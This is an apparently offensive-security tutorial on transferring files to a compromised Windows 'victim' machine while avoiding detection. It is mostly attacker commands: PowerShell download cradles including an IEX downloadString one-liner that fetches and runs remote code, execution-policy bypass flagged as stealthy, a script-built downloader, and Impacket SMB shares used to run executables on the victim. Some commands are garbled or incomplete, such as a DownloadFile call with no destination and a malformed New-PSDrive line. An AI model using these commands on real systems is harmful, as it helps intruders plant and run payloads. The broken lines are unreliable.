Foreword
To avoid detection, it is best to use tools that are native to the victim’s computer.
FTP with Windows Host
While having a shell on the Windows machine, start an FTP server on your host machine. Follow these steps if you don’t already have FTP server installed:
sudo apt-get install vsftpd
sudo service vsftpd start
service vsftpd status #status should be active
To check if your server is working, type ftp localhost.
If you see the message “Connected to localhost”, your FTP server is running.
Accessing File With Interactive Shell
If you have an interactive shell on the Windows machine, run this command.
cscript wget.vbs http://<YOUR IP>/<PATH TO FILE> <FILENAME TO SAVE AS>
Accessing File With Non-Interactive Shell
If you don’t have an interactive shell, you can’t start PowerShell.exe. A workaround is to create a PowerShell script and execute it:
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://<YOUR IP>/<PATH TO FILE>" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
To invokewget.ps1
, call
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
-ExecutionPolicy Bypass -noLogo -NonInteractive --- stealthly
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://<YOUR IP>/<FILENAME>')"
IEX(New-Object Net.WebClient).downloadString('http://<YOUR IP>/<FILENAME>')
Getting Files Through PowerShell
On your Kali Linux machine, make a copy of the file you want to send to /var/www/html/
. On the Window’s machine, execute the following:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.10.128/unko.txt','C:\Users\Administrator\Desktop\transferme.txt')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.146/gori.ps1')"
File Transfer With SMB
Method 1
Get smbserver.py
from Impacket and run the following on your Kali Linux machine:
smbserver.py gori $(pwd) -smb2support -user gori -pass gorigori
Run this on the victim’s machine:
New-PSDrive -Name "gori" -PSProvider "FileSystem" -gori "\\<YOUR IP>\gori"
Method 2
Run this on your Kali machine:
smbserver.py kali .
Run this on the victim’s machine:
On victim's \\<YOUR IP ADDRESS>\kali\FILE\_NAME.exe "whoami" # "whoami" confirms that it is running
File Transfer With an HTTP Server
On your machine run:
python3 -m http.server 80
This will start an HTTP server on port 80 with the root of the HTTP server being in the directory that you executed the command from. To get a file, run this on the victim’s machine:
wget http://<YOUR IP>/path/to/file.txt
File Transfer with SCP and RSYNC
Both of these methods of file transfer occur over SSH. Secure Copy Protocol (SCP) is being deprecated, however, if you’re able to use it, the syntax is fairly simple.
scp <SOURCE> <DESTINATION>
In this example, we are using SCP to copy a file from a remote host to the working directory of our local machine such that our computer is on the receiving end.
scp username@ip_address:/home/username/filename
If you are looking to transfer a file from your computer to the remote host, the following syntax can be used:
scp filename username@ip_address:/home/username
The same commands can be used with RYSNC by simply replacing scp
with rsync
.
rsync <SOURCE> <DESTINATION>
Conclusion
There are countless ways to transfer files between two computers. Among the most common methods are HTTP and FTP, but if those don’t work, there is a chance that some of the other options here will. Some honorable mentions that I didn’t go into detail on are SSHFS, SFTP, Winscp, and Samba. I hope that you were able to find value in this article and remember to never stop learning.